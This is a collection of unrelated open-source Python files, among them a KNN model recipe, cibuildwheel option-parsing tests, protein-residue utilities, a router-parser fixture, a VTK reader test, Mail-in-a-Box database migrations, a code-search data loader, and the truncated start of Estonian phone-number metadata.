def mutate_params(self, accuracy=10, time_tolerance=10, interpretability=1, get_best=False, **kwargs):
# Modify certain parameters for tuning
user_choice = config.recipe_dict.copy()
self.params = dict()
trial = kwargs.get('trial')
list_of_neibs = [1, 2, 5, 10, 50, 100, 150, 200]
if config.recipe == 'kaggle':
list_of_neibs.extend([250, 300])
if 'GIT_HASH' in os.environ and config.hard_asserts:
list_of_neibs = [1]
self.params['n_neighbors'] = MainModel.get_one(list_of_neibs, get_best=get_best,
best_type="first", name="n_neighbors",
trial=trial,
user_choice=user_choice)
self.params['metric'] = MainModel.get_one(["minkowski", "cityblock"], get_best=get_best,
best_type="first", name="metric",
trial=trial,
user_choice=user_choice)
self.params['algorithm'] = MainModel.get_one(['auto', 'ball_tree', 'kd_tree', 'brute'], get_best=get_best,
best_type="first", name="algorithm",
trial=trial,
user_choice=user_choice)
self.params['leaf_size'] = MainModel.get_one([30, 4, 100], get_best=get_best,
best_type="first", name="leaf_size",
trial=trial,
user_choice=user_choice)
self.params['p'] = MainModel.get_one([2, 1], get_best=get_best,
best_type="first", name="p",
trial=trial,
user_choice=user_choice)
self.params['weights'] = MainModel.get_one(['uniform', 'distance'], get_best=get_best,
best_type="first", name="weights",
trial=trial,
user_choice=user_choice)
self.params['standardize'] = MainModel.get_one([False, True], get_best=get_best,
best_type="first", name="standardize",
trial=trial,
user_choice=user_choice)
def transcribe_params(self, params=None, **kwargs):
"""
Fix up params to avoid conflicts that are not easily expressible for Optuna,
or system settings that only need to be set at fit time.
:param params:
:return:
"""
params_was_None = False
if params is None:
params = self.params # reference, so goes back into self.params
params_was_None = True
# add anything that needs fixing
if params.get('algorithm', "") not in ['ball_tree', 'kd_tree']:
params.pop('leaf_size', None)
if isinstance(kwargs.get('train_shape'), (tuple, list)) and kwargs.get('train_shape')[0] > 1:
params['n_neighbors'] = min(params['n_neighbors'], kwargs.get('train_shape')[0])
params.pop('standardize', None) # internal parameter, not for actual underlying sklearn model
if params_was_None:
# in case some function didn't preserve reference
self.params = params
return params # default is no transcription
def fit(self, X, y, sample_weight=None, eval_set=None, sample_weight_eval_set=None, **kwargs):
# System setting: not part of default/mutated params, just set at fit time into self.params so it is visible.
self.params["n_jobs"] = self.params_base.get('n_jobs', max(1, physical_cores_count))
params = self.params.copy()
params = self.transcribe_params(params, train_shape=X.shape)
loggerinfo(self.get_logger(**kwargs), "%s fit params: %s" % (self.display_name, dict(params)))
loggerinfo(self.get_logger(**kwargs), "%s data: %s %s" % (self.display_name, X.shape, y.shape))
X = dt.Frame(X)
orig_cols = list(X.names)
if self.num_classes >= 2:
model = KNeighborsClassifier(**params)
lb = LabelEncoder()
lb.fit(self.labels)
y = lb.transform(y)
else:
model = KNeighborsRegressor(**params)
X = self.basic_impute(X)
X = X.to_numpy()
if self.params.get('standardize', False): # self.params since params has it popped out
standard_scaler = StandardScaler()
X = standard_scaler.fit_transform(X)
else:
standard_scaler = None
model.fit(X, y)
importances = self.get_basic_importances(X, y)
self.set_model_properties(model=(model, standard_scaler, self.min),
features=orig_cols,
importances=importances.tolist(), # abs(model.coef_[0])
iterations=0)
def basic_impute(self, X):
# scikit extra trees internally converts to np.float32 during all operations,
# so if float64 datatable, need to cast first, in case will be nan for float32
from h2oaicore.systemutils import update_precision
X = update_precision(X, data_type=np.float32, override_with_data_type=True, fixup_almost_numeric=True)
# Replace missing values with a value smaller than all observed values
if not hasattr(self, 'min') or not isinstance(self.min, dict):
self.min = dict()
for col in X.names:
XX = X[:, col]
if col not in self.min:
self.min[col] = XX.min1()
if self.min[col] is None or np.isnan(self.min[col]) or np.isinf(self.min[col]):
self.min[col] = -1e10
else:
self.min[col] -= 1
XX.replace([None, np.inf, -np.inf], self.min[col])
X[:, col] = XX
assert X[dt.isna(dt.f[col]), col].nrows == 0
return X
def get_basic_importances(self, X, y):
# Just get feature importance using basic model so at least something to consume by genetic algorithm
if isinstance(X, dt.Frame):
X = X.to_numpy()
elif isinstance(X, pd.DataFrame):
X = X.values
# not in self, just for importances regardless of real model behavior
standard_scaler = StandardScaler()
X = standard_scaler.fit_transform(X)
from sklearn.linear_model import Ridge # will be used to derive feature importances
feature_model = Ridge(alpha=1., random_state=self.random_state)
feature_model.fit(X, y)
return np.array(abs(feature_model.coef_))
def predict(self, X, **kwargs):
model_tuple, _, _, _ = self.get_model_properties()
if len(model_tuple) == 3:
model, standard_scaler, self.min = model_tuple
else:
# migration for old recipe version
model = model_tuple
standard_scaler = None
self.min = dict()
X = dt.Frame(X)
X = self.basic_impute(X)
X = X.to_numpy()
if standard_scaler is not None:
X = standard_scaler.transform(X)
pred_contribs = kwargs.get('pred_contribs', None)
output_margin = kwargs.get('output_margin', None)
if not pred_contribs:
if self.num_classes == 1:
preds = model.predict(X)
else:
preds = model.predict_proba(X)
# preds = (prob_pos - prob_pos.min()) / (prob_pos.max() - prob_pos.min())
return preds
else:
raise NotImplementedError("No Shapley for K-nearest model")
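# Illustrative sketch of the plain-sklearn flow this recipe wraps (standalone
# example; X_train, y_train, X_test are hypothetical arrays, not recipe inputs):
#   from sklearn.neighbors import KNeighborsClassifier
#   from sklearn.preprocessing import StandardScaler
#   scaler = StandardScaler()
#   X_std = scaler.fit_transform(X_train)
#   knn = KNeighborsClassifier(n_neighbors=10, weights="distance", metric="minkowski", p=2)
#   knn.fit(X_std, y_train)
#   probs = knn.predict_proba(scaler.transform(X_test))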
# ===== /unit_test/options_test.py (repo: pypa/cibuildwheel, license: BSD-2-Clause) =====
from __future__ import annotations
import os
import platform as platform_module
import textwrap
from pathlib import Path
import pytest
from cibuildwheel.__main__ import get_build_identifiers, get_platform_module
from cibuildwheel.bashlex_eval import local_environment_executor
from cibuildwheel.environment import parse_environment
from cibuildwheel.options import (
CommandLineArguments,
Options,
_get_pinned_container_images,
)
PYPROJECT_1 = """
[tool.cibuildwheel]
build = ["cp38*", "cp37*"]
skip = ["*musllinux*"]
environment = {FOO="BAR"}
test-command = "pyproject"
manylinux-x86_64-image = "manylinux1"
environment-pass = ["EXAMPLE_ENV"]
[tool.cibuildwheel.macos]
test-requires = "else"
[[tool.cibuildwheel.overrides]]
select = "cp37*"
test-command = "pyproject-override"
manylinux-x86_64-image = "manylinux2014"
"""
def test_options_1(tmp_path, monkeypatch):
with tmp_path.joinpath("pyproject.toml").open("w") as f:
f.write(PYPROJECT_1)
args = CommandLineArguments.defaults()
args.package_dir = tmp_path
monkeypatch.setattr(platform_module, "machine", lambda: "x86_64")
options = Options(platform="linux", command_line_arguments=args, env={})
module = get_platform_module("linux")
identifiers = get_build_identifiers(
platform_module=module,
build_selector=options.globals.build_selector,
architectures=options.globals.architectures,
)
override_display = """\
*: pyproject
cp37-manylinux_x86_64, cp37-manylinux_i686: pyproject-override"""
print(options.summary(identifiers))
assert override_display in options.summary(identifiers)
default_build_options = options.build_options(identifier=None)
assert default_build_options.environment == parse_environment('FOO="BAR"')
all_pinned_container_images = _get_pinned_container_images()
pinned_x86_64_container_image = all_pinned_container_images["x86_64"]
local = options.build_options("cp38-manylinux_x86_64")
assert local.manylinux_images is not None
assert local.test_command == "pyproject"
assert local.manylinux_images["x86_64"] == pinned_x86_64_container_image["manylinux1"]
local = options.build_options("cp37-manylinux_x86_64")
assert local.manylinux_images is not None
assert local.test_command == "pyproject-override"
assert local.manylinux_images["x86_64"] == pinned_x86_64_container_image["manylinux2014"]
def test_passthrough(tmp_path, monkeypatch):
with tmp_path.joinpath("pyproject.toml").open("w") as f:
f.write(PYPROJECT_1)
args = CommandLineArguments.defaults()
args.package_dir = tmp_path
monkeypatch.setattr(platform_module, "machine", lambda: "x86_64")
options = Options(platform="linux", command_line_arguments=args, env={"EXAMPLE_ENV": "ONE"})
default_build_options = options.build_options(identifier=None)
assert default_build_options.environment.as_dictionary(prev_environment={}) == {
"FOO": "BAR",
"EXAMPLE_ENV": "ONE",
}
@pytest.mark.parametrize(
"env_var_value",
[
"normal value",
'"value wrapped in quotes"',
"an unclosed single-quote: '",
'an unclosed double-quote: "',
"string\nwith\ncarriage\nreturns\n",
"a trailing backslash \\",
],
)
def test_passthrough_evil(tmp_path, monkeypatch, env_var_value):
args = CommandLineArguments.defaults()
args.package_dir = tmp_path
monkeypatch.setattr(platform_module, "machine", lambda: "x86_64")
options = Options(
platform="linux",
command_line_arguments=args,
env={"CIBW_ENVIRONMENT_PASS_LINUX": "ENV_VAR", "ENV_VAR": env_var_value},
)
parsed_environment = options.build_options(identifier=None).environment
assert parsed_environment.as_dictionary(prev_environment={}) == {"ENV_VAR": env_var_value}
xfail_env_parse = pytest.mark.xfail(
raises=SystemExit, reason="until we can figure out the right way to quote these values"
)
@pytest.mark.parametrize(
"env_var_value",
[
"normal value",
pytest.param('"value wrapped in quotes"', marks=[xfail_env_parse]),
pytest.param('an unclosed double-quote: "', marks=[xfail_env_parse]),
"string\nwith\ncarriage\nreturns\n",
pytest.param("a trailing backslash \\", marks=[xfail_env_parse]),
],
)
def test_toml_environment_evil(tmp_path, env_var_value):
args = CommandLineArguments.defaults()
args.package_dir = tmp_path
tmp_path.joinpath("pyproject.toml").write_text(
textwrap.dedent(
f"""\
[tool.cibuildwheel.environment]
EXAMPLE='''{env_var_value}'''
"""
)
)
options = Options(platform="linux", command_line_arguments=args, env={})
parsed_environment = options.build_options(identifier=None).environment
assert parsed_environment.as_dictionary(prev_environment={}) == {"EXAMPLE": env_var_value}
@pytest.mark.parametrize(
("toml_assignment", "result_value"),
[
('TEST_VAR="simple_value"', "simple_value"),
# spaces
('TEST_VAR="simple value"', "simple value"),
# env var
('TEST_VAR="$PARAM"', "spam"),
('TEST_VAR="$PARAM $PARAM"', "spam spam"),
# env var extension
('TEST_VAR="before:$PARAM:after"', "before:spam:after"),
# env var extension with spaces
('TEST_VAR="before $PARAM after"', "before spam after"),
# literal $ - this test is just for reference, I'm not sure if this
# syntax will work if we change the TOML quoting behaviour
(r'TEST_VAR="before\\$after"', "before$after"),
],
)
def test_toml_environment_quoting(tmp_path: Path, toml_assignment, result_value):
args = CommandLineArguments.defaults()
args.package_dir = tmp_path
tmp_path.joinpath("pyproject.toml").write_text(
textwrap.dedent(
f"""\
[tool.cibuildwheel.environment]
{toml_assignment}
"""
)
)
options = Options(platform="linux", command_line_arguments=args, env={})
parsed_environment = options.build_options(identifier=None).environment
environment_values = parsed_environment.as_dictionary(
prev_environment={**os.environ, "PARAM": "spam"},
executor=local_environment_executor,
)
assert environment_values["TEST_VAR"] == result_value
@pytest.mark.parametrize(
("toml_assignment", "result_name", "result_create_args"),
[
(
'container-engine = "podman"',
"podman",
[],
),
(
'container-engine = {name = "podman"}',
"podman",
[],
),
(
'container-engine = "docker; create_args: --some-option"',
"docker",
["--some-option"],
),
(
'container-engine = {name = "docker", create-args = ["--some-option"]}',
"docker",
["--some-option"],
),
(
'container-engine = {name = "docker", create-args = ["--some-option", "value that contains spaces"]}',
"docker",
["--some-option", "value that contains spaces"],
),
(
'container-engine = {name = "docker", create-args = ["--some-option", "value;that;contains;semicolons"]}',
"docker",
["--some-option", "value;that;contains;semicolons"],
),
],
)
def test_container_engine_option(tmp_path: Path, toml_assignment, result_name, result_create_args):
args = CommandLineArguments.defaults()
args.package_dir = tmp_path
tmp_path.joinpath("pyproject.toml").write_text(
textwrap.dedent(
f"""\
[tool.cibuildwheel]
{toml_assignment}
"""
)
)
options = Options(platform="linux", command_line_arguments=args, env={})
parsed_container_engine = options.globals.container_engine
assert parsed_container_engine.name == result_name
assert parsed_container_engine.create_args == result_create_args
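# These tests are typically run with pytest from the repository root, e.g.:
#   pytest unit_test/options_test.py -k test_options_1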
# ===== /iotbx/pdb/aa_utils.py (repo: cctbx/cctbx_project, license: BSD-3-Clause-LBNL) =====
from __future__ import division, print_function
from iotbx.pdb import modified_aa_names
from iotbx.pdb.amino_acid_codes import three_letter_given_one_letter
from iotbx.pdb.amino_acid_codes import one_letter_given_three_letter
from mmtbx.chemical_components import get_atom_names, get_bond_pairs
def get_aa_parent(code):
one = modified_aa_names.lookup.get(code.upper(), False)
if not one: return None
return three_letter_given_one_letter.get(one, None)
def get_aa_children(code):
one = one_letter_given_three_letter.get(code, None)
if one is None: return None
if one not in modified_aa_names.lookup.values(): return None
rc=[]
for key, item in modified_aa_names.lookup.items():
if item==one: rc.append(key)
rc.sort()
return rc
def standard_polymerise(code):
names = get_atom_names(code, heavy_atom_only=True)
names = set(names)
return set(['N','CA','C','O']).issubset(names)
def compare_atom_names(child, parent):
c_names = set(get_atom_names(child))
p_names = get_atom_names(parent, heavy_atom_only=True)
p_names.remove('OXT')
return set(p_names).issubset(c_names)
def _is_specific_number_heavy_bonds(bonds, name, number, verbose=False):
n_bonds = 0
for bond in bonds:
if verbose: print(bond)
if 'OXT' in bond: continue
if name in bond:
n_bonds+=1
if verbose: print(n_bonds)
return n_bonds!=number
def is_n_terminal(bonds):
return _is_specific_number_heavy_bonds(bonds, 'N', 1)
def is_c_terminal(bonds):
return _is_specific_number_heavy_bonds(bonds, 'C', 2)
def is_ca_mod(bonds, n_bonds=3):
return _is_specific_number_heavy_bonds(bonds, 'CA', n_bonds)
def is_standard_bonding(bonds, include_cb=True):
standard = [('CA', 'N'), ('C', 'CA'), ('C', 'O')]
if include_cb:
standard.append(('CA', 'CB'))
return set(standard).issubset(set(bonds))
def is_not_standard_main_chain(code):
assert standard_polymerise(code)
bonds = get_bond_pairs(code, heavy_atom_only=True, use_tuple=True)
if is_n_terminal(bonds):
return 'N terminal'
elif is_c_terminal(bonds):
return 'C terminal'
elif is_ca_mod(bonds):
return 'CA mod'
elif not is_standard_bonding(bonds):
return 'bonding mod'
return False
def get_aa_type(code):
parent = get_aa_parent(code)
if not standard_polymerise(code):
return 'non-polymer'
exact_subset = True
if not compare_atom_names(code, parent):
exact_subset = False
standard_main_chain = True
if is_not_standard_main_chain(code):
standard_main_chain = False
return is_not_standard_main_chain(code)
return 'ok'
def get_useable_sorted_on_size(code):
rc = get_aa_children(code)
tmp = []
overall = {}
for code in rc:
aa_type = get_aa_type(code)
overall.setdefault(aa_type, [])
overall[aa_type].append(code)
if aa_type in ['ok']:
tmp.append(code)
def myFunc(e): return len(get_atom_names(e, heavy_atom_only=True))
tmp.sort(key=myFunc)
return tmp
def tst_types(code):
rc = get_aa_children(code)
overall = {}
for code in rc:
aa_type = get_aa_type(code)
overall.setdefault(aa_type, [])
overall[aa_type].append(code)
print(overall)
for key, item in overall.items():
print(key, item)
if __name__ == '__main__':
import os, sys
if len(sys.argv)>1:
aa_list = sys.argv[1:]
else:
aa_list = ['CYS', 'DAL', 'NWM', 'GLY']
for resname in aa_list:
rc = get_aa_parent(resname)
print(' Parent %s : %s' % (resname, rc))
rc = get_aa_children(resname)
print(' Children %s : %s' % (resname, rc))
print(get_useable_sorted_on_size(resname))
tst_types(resname)
continue
for code in rc:
print(code,get_aa_type(code))
# cmd = 'phenix.reel --chem %s' % code
# os.system(cmd)
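# Illustrative session (hedged: exact results depend on the bundled
# modified_aa_names / chemical_components tables):
#   get_aa_parent('DAL')    -> expected 'ALA' (D-alanine maps back to alanine)
#   get_aa_children('GLY')  -> sorted list of residue codes whose parent is glycine
#   get_aa_type('DAL')      -> 'ok' when atoms and main-chain bonding match the parent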
# ===== /src/genie/libs/parser/junos/tests/ShowRouteAdvertisingProtocolDetail/cli/equal/golden_output_3_expected.py (repo: CiscoTestAutomation/genieparser, license: Apache-2.0) =====
expected_output = {
"route-information": {
"route-table": [
{
"active-route-count": "1",
"destination-count": "1",
"hidden-route-count": "0",
"holddown-route-count": "0",
"rt-entry": {
"active-tag": "*",
"as-path": "[1] I",
"bgp-group": {
"bgp-group-name": "eBGP_SUT-2",
"bgp-group-type": "External",
},
"flags": "Nexthop Change",
"med": "1",
"nh": {"to": "Self"},
"route-label": "17",
"rt-announced-count": "1",
"rt-destination": "10.36.3.3",
"rt-entry-count": "1",
"rt-prefix-length": "32",
},
"table-name": "inet.3",
"total-route-count": "1",
}
]
}
}
# ===== /IO/Geometry/Testing/Python/TestChacoReader.py (repo: Kitware/VTK, license: BSD-3-Clause) =====
#!/usr/bin/env python
from vtkmodules.vtkFiltersGeometry import vtkGeometryFilter
from vtkmodules.vtkIOGeometry import vtkChacoReader
from vtkmodules.vtkRenderingCore import (
vtkActor,
vtkPolyDataMapper,
vtkRenderWindow,
vtkRenderWindowInteractor,
vtkRenderer,
)
import vtkmodules.vtkInteractionStyle
import vtkmodules.vtkRenderingFreeType
import vtkmodules.vtkRenderingOpenGL2
from vtkmodules.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# read in a Chaco file
chReader = vtkChacoReader()
chReader.SetBaseName(VTK_DATA_ROOT + "/Data/vwgt")
chReader.SetGenerateGlobalElementIdArray(1)
chReader.SetGenerateGlobalNodeIdArray(1)
chReader.SetGenerateEdgeWeightArrays(1)
chReader.SetGenerateVertexWeightArrays(1)
geom = vtkGeometryFilter()
geom.SetInputConnection(chReader.GetOutputPort())
mapper = vtkPolyDataMapper()
mapper.SetInputConnection(geom.GetOutputPort())
mapper.SetColorModeToMapScalars()
mapper.SetScalarModeToUsePointFieldData()
mapper.SelectColorArray("VertexWeight1")
mapper.SetScalarRange(1, 5)
actor0 = vtkActor()
actor0.SetMapper(mapper)
# Create the RenderWindow, Renderer and interactor
#
ren1 = vtkRenderer()
renWin = vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actor to the renderer, set the background and size
#
ren1.AddActor(actor0)
ren1.SetBackground(0, 0, 0)
renWin.SetSize(300, 300)
renWin.SetMultiSamples(0)
iren.Initialize()
renWin.Render()
#iren.Start()
# ===== /setup/migrate.py (repo: mail-in-a-box/mailinabox, license: CC0-1.0) =====
#!/usr/bin/python3
# Migrates any file structures, database schemas, etc. between versions of Mail-in-a-Box.
# We have to be careful here that any dependencies are already installed in the previous
# version since this script runs before all other aspects of the setup script.
import sys, os, os.path, glob, re, shutil
sys.path.insert(0, 'management')
from utils import load_environment, save_environment, shell
def migration_1(env):
# Re-arrange where we store SSL certificates. There was a typo also.
def move_file(fn, domain_name_escaped, file_type):
# Moves an SSL-related file into the right place.
fn1 = os.path.join( env["STORAGE_ROOT"], 'ssl', domain_name_escaped, file_type)
os.makedirs(os.path.dirname(fn1), exist_ok=True)
shutil.move(fn, fn1)
# Migrate the 'domains' directory.
for sslfn in glob.glob(os.path.join( env["STORAGE_ROOT"], 'ssl/domains/*' )):
fn = os.path.basename(sslfn)
m = re.match("(.*)_(certifiate.pem|cert_sign_req.csr|private_key.pem)$", fn)
if m:
# get the new name for the file
domain_name, file_type = m.groups()
if file_type == "certifiate.pem": file_type = "ssl_certificate.pem" # typo
if file_type == "cert_sign_req.csr": file_type = "certificate_signing_request.csr" # nicer
move_file(sslfn, domain_name, file_type)
# Move the old domains directory if it is now empty.
try:
os.rmdir(os.path.join( env["STORAGE_ROOT"], 'ssl/domains'))
except:
pass
def migration_2(env):
# Delete the .dovecot_sieve script everywhere. This was formerly a copy of our spam -> Spam
# script. We now install it as a global script, and we use managesieve, so the old file is
# irrelevant. Also delete the compiled binary form.
for fn in glob.glob(os.path.join(env["STORAGE_ROOT"], 'mail/mailboxes/*/*/.dovecot.sieve')):
os.unlink(fn)
for fn in glob.glob(os.path.join(env["STORAGE_ROOT"], 'mail/mailboxes/*/*/.dovecot.svbin')):
os.unlink(fn)
def migration_3(env):
# Move the migration ID from /etc/mailinabox.conf to $STORAGE_ROOT/mailinabox.version
# so that the ID stays with the data files that it describes the format of. The writing
# of the file will be handled by the main function.
pass
def migration_4(env):
# Add a new column to the mail users table where we can store administrative privileges.
db = os.path.join(env["STORAGE_ROOT"], 'mail/users.sqlite')
shell("check_call", ["sqlite3", db, "ALTER TABLE users ADD privileges TEXT NOT NULL DEFAULT ''"])
def migration_5(env):
# The secret key for encrypting backups was world readable. Fix here.
os.chmod(os.path.join(env["STORAGE_ROOT"], 'backup/secret_key.txt'), 0o600)
def migration_6(env):
# We now will generate multiple DNSSEC keys for different algorithms, since TLDs may
# not support them all. .email only supports RSA/SHA-256. Rename the keys.conf file
# to be algorithm-specific.
basepath = os.path.join(env["STORAGE_ROOT"], 'dns/dnssec')
shutil.move(os.path.join(basepath, 'keys.conf'), os.path.join(basepath, 'RSASHA1-NSEC3-SHA1.conf'))
def migration_7(env):
# I previously wanted domain names to be stored in Unicode in the database. Now I want them
# to be in IDNA. Affects aliases only.
import sqlite3
conn = sqlite3.connect(os.path.join(env["STORAGE_ROOT"], "mail/users.sqlite"))
# Get existing alias source addresses.
c = conn.cursor()
c.execute('SELECT source FROM aliases')
aliases = [ row[0] for row in c.fetchall() ]
# Update to IDNA-encoded domains.
for email in aliases:
try:
localpart, domainpart = email.split("@")
domainpart = domainpart.encode("idna").decode("ascii")
newemail = localpart + "@" + domainpart
if newemail != email:
c = conn.cursor()
c.execute("UPDATE aliases SET source=? WHERE source=?", (newemail, email))
if c.rowcount != 1: raise ValueError("Alias not found.")
print("Updated alias", email, "to", newemail)
except Exception as e:
print("Error updating IDNA alias", email, e)
# Save.
conn.commit()
def migration_8(env):
# Delete DKIM keys. We had generated 1024-bit DKIM keys.
# By deleting the key file we'll automatically generate
# a new key, which will be 2048 bits.
os.unlink(os.path.join(env['STORAGE_ROOT'], 'mail/dkim/mail.private'))
def migration_9(env):
# Add a column to the aliases table to store permitted_senders,
# which is a list of user account email addresses that are
# permitted to send mail using this alias instead of their own
# address. This was motivated by the addition of #427 ("Reject
# outgoing mail if FROM does not match Login") - which introduced
# the notion of outbound permitted-senders.
db = os.path.join(env["STORAGE_ROOT"], 'mail/users.sqlite')
shell("check_call", ["sqlite3", db, "ALTER TABLE aliases ADD permitted_senders TEXT"])
def migration_10(env):
# Clean up the SSL certificates directory.
# Move the primary certificate to a new name and then
# symlink it to the system certificate path.
import datetime
system_certificate = os.path.join(env["STORAGE_ROOT"], 'ssl/ssl_certificate.pem')
if not os.path.islink(system_certificate): # not already a symlink
new_path = os.path.join(env["STORAGE_ROOT"], 'ssl', env['PRIMARY_HOSTNAME'] + "-" + datetime.datetime.now().date().isoformat().replace("-", "") + ".pem")
print("Renamed", system_certificate, "to", new_path, "and created a symlink for the original location.")
shutil.move(system_certificate, new_path)
os.symlink(new_path, system_certificate)
# Flatten the directory structure. For any directory
# that contains a single file named ssl_certificate.pem,
# move the file out and name it the same as the directory,
# and remove the directory.
for sslcert in glob.glob(os.path.join( env["STORAGE_ROOT"], 'ssl/*/ssl_certificate.pem' )):
d = os.path.dirname(sslcert)
if len(os.listdir(d)) == 1:
# This certificate is the only file in that directory.
newname = os.path.join(env["STORAGE_ROOT"], 'ssl', os.path.basename(d) + '.pem')
if not os.path.exists(newname):
shutil.move(sslcert, newname)
os.rmdir(d)
def migration_11(env):
# Archive the old Let's Encrypt account directory managed by free_tls_certificates
# because we'll use that path now for the directory managed by certbot.
try:
old_path = os.path.join(env["STORAGE_ROOT"], 'ssl', 'lets_encrypt')
new_path = os.path.join(env["STORAGE_ROOT"], 'ssl', 'lets_encrypt-old')
shutil.move(old_path, new_path)
except:
# meh
pass
def migration_12(env):
# Upgrading to Carddav Roundcube plugin to version 3+, it requires the carddav_*
# tables to be dropped.
# Checking that the roundcube database already exists.
if os.path.exists(os.path.join(env["STORAGE_ROOT"], "mail/roundcube/roundcube.sqlite")):
import sqlite3
conn = sqlite3.connect(os.path.join(env["STORAGE_ROOT"], "mail/roundcube/roundcube.sqlite"))
c = conn.cursor()
# Get a list of all the tables that begin with 'carddav_'
c.execute("SELECT name FROM sqlite_master WHERE type = ? AND name LIKE ?", ('table', 'carddav_%'))
carddav_tables = c.fetchall()
# If there were tables that begin with 'carddav_', drop them
if carddav_tables:
for table in carddav_tables:
try:
table = table[0]
c = conn.cursor()
dropcmd = "DROP TABLE %s" % table
c.execute(dropcmd)
except Exception as e:
print("Failed to drop table", table, e)
# Save.
conn.commit()
conn.close()
# Delete all sessions, requiring users to log in again to recreate carddav_*
# databases
conn = sqlite3.connect(os.path.join(env["STORAGE_ROOT"], "mail/roundcube/roundcube.sqlite"))
c = conn.cursor()
c.execute("delete from session;")
conn.commit()
conn.close()
def migration_13(env):
# Add the "mfa" table for configuring MFA for login to the control panel.
db = os.path.join(env["STORAGE_ROOT"], 'mail/users.sqlite')
shell("check_call", ["sqlite3", db, "CREATE TABLE mfa (id INTEGER PRIMARY KEY AUTOINCREMENT, user_id INTEGER NOT NULL, type TEXT NOT NULL, secret TEXT NOT NULL, mru_token TEXT, label TEXT, FOREIGN KEY (user_id) REFERENCES users(id) ON DELETE CASCADE);"])
def migration_14(env):
# Add the "auto_aliases" table.
db = os.path.join(env["STORAGE_ROOT"], 'mail/users.sqlite')
shell("check_call", ["sqlite3", db, "CREATE TABLE auto_aliases (id INTEGER PRIMARY KEY AUTOINCREMENT, source TEXT NOT NULL UNIQUE, destination TEXT NOT NULL, permitted_senders TEXT);"])
###########################################################
def get_current_migration():
ver = 0
while True:
next_ver = (ver + 1)
migration_func = globals().get("migration_%d" % next_ver)
if not migration_func:
return ver
ver = next_ver
def run_migrations():
if not os.access("/etc/mailinabox.conf", os.W_OK, effective_ids=True):
print("This script must be run as root.", file=sys.stderr)
sys.exit(1)
env = load_environment()
migration_id_file = os.path.join(env['STORAGE_ROOT'], 'mailinabox.version')
migration_id = None
if os.path.exists(migration_id_file):
with open(migration_id_file) as f:
migration_id = f.read().strip()
if migration_id is None:
# Load the legacy location of the migration ID. We'll drop support
# for this eventually.
migration_id = env.get("MIGRATIONID")
if migration_id is None:
print()
print("%s file doesn't exists. Skipping migration..." % (migration_id_file,))
return
ourver = int(migration_id)
while True:
next_ver = (ourver + 1)
migration_func = globals().get("migration_%d" % next_ver)
if not migration_func:
# No more migrations to run.
break
print()
print("Running migration to Mail-in-a-Box #%d..." % next_ver)
try:
migration_func(env)
except Exception as e:
print()
print("Error running the migration script:")
print()
print(e)
print()
print("Your system may be in an inconsistent state now. We're terribly sorry. A re-install from a backup might be the best way to continue.")
sys.exit(1)
ourver = next_ver
# Write out our current version now. Do this sooner rather than later
# in case of any problems.
with open(migration_id_file, "w") as f:
f.write(str(ourver) + "\n")
# Delete the legacy location of this field.
if "MIGRATIONID" in env:
del env["MIGRATIONID"]
save_environment(env)
# iterate and try next version...
if __name__ == "__main__":
if sys.argv[-1] == "--current":
# Return the number of the highest migration.
print(str(get_current_migration()))
elif sys.argv[-1] == "--migrate":
# Perform migrations.
run_migrations()
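# Usage (per the __main__ block above; run_migrations() requires root since it
# checks write access to /etc/mailinabox.conf):
#   setup/migrate.py --current   # print the highest migration number this script knows about
#   setup/migrate.py --migrate   # apply any pending migrations and record the new version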
# ===== /keras/data_loader.py (repo: guxd/deep-code-search, license: MIT) =====
import pickle
import codecs
import tables
import numpy as np
from tqdm import tqdm
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO, format="%(asctime)s: %(name)s: %(levelname)s: %(message)s")
def load_pickle(filename):
return pickle.load(open(filename, 'rb'))
##### Data Set #####
def load_codebase(path, chunk_size):
"""load codebase
codefile: h5 file that stores raw code
"""
logger.info('Loading codebase (chunk size={})..'.format(chunk_size))
codebase=[]
#codes=codecs.open(self.path+self.data_params['use_codebase']).readlines()
codes=codecs.open(path, encoding='utf8',errors='replace').readlines()
#use codecs to read in case of encoding problem
for i in tqdm(range(0,len(codes), chunk_size)):
codebase.append(codes[i:i+chunk_size])
return codebase
### Results Data ###
def load_code_reprs(path, chunk_size):
"""reads vectors (2D numpy array) from a hdf5 file"""
logger.debug(f'Loading code vectors (chunk size={chunk_size})..')
codereprs=[]
h5f = tables.open_file(path)
vecs = h5f.root.vecs
for i in range(0, len(vecs), chunk_size):
codereprs.append(vecs[i: i+ chunk_size])
h5f.close()
return codereprs
def save_code_reprs(vecs, path):
npvecs=np.array(vecs)
fvec = tables.open_file(path, 'w')
atom = tables.Atom.from_dtype(npvecs.dtype)
filters = tables.Filters(complib='blosc', complevel=5)
ds = fvec.create_carray(fvec.root, 'vecs', atom, npvecs.shape,filters=filters)
ds[:] = npvecs
fvec.close()
def load_hdf5(vecfile, start_offset, chunk_size):
"""reads training sentences(list of int array) from a hdf5 file"""
table = tables.open_file(vecfile)
data = table.get_node('/phrases')[:].astype(int)  # np.int was an alias of the builtin int and is removed in recent NumPy
index = table.get_node('/indices')[:]
data_len = index.shape[0]
if chunk_size==-1:#if chunk_size is set to -1, then, load all data
chunk_size=data_len
start_offset = start_offset%data_len
logger.debug("{} entries".format(data_len))
logger.debug("starting from offset {} to {}".format(start_offset,start_offset+chunk_size))
sents = []
for offset in tqdm(range(start_offset, start_offset+chunk_size)):
offset = offset%data_len
len, pos = index[offset]['length'], index[offset]['pos']
sents.append(data[pos:pos + len])
table.close()
return sents
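# Minimal usage sketch (illustrative; the file name is a placeholder):
#   vecs = np.random.rand(1000, 128).astype('float32')
#   save_code_reprs(vecs, 'use.codevecs.h5')                      # writes a '/vecs' carray
#   chunks = load_code_reprs('use.codevecs.h5', chunk_size=200)   # -> 5 chunks of 200 vectors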
# ===== /python/phonenumbers/data/region_EE.py (repo: daviddrysdale/python-phonenumbers, license: Apache-2.0) =====
"""Auto-generated file, do not edit by hand. EE metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_EE = PhoneMetadata(id='EE', country_code=372, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='8\\d{9}|[4578]\\d{7}|(?:[3-8]\\d|90)\\d{5}', possible_length=(7, 8, 10)),
fixed_line=PhoneNumberDesc(national_number_pattern='(?:3[23589]|4[3-8]|6\\d|7[1-9]|88)\\d{5}', example_number='3212345', possible_length=(7,)),
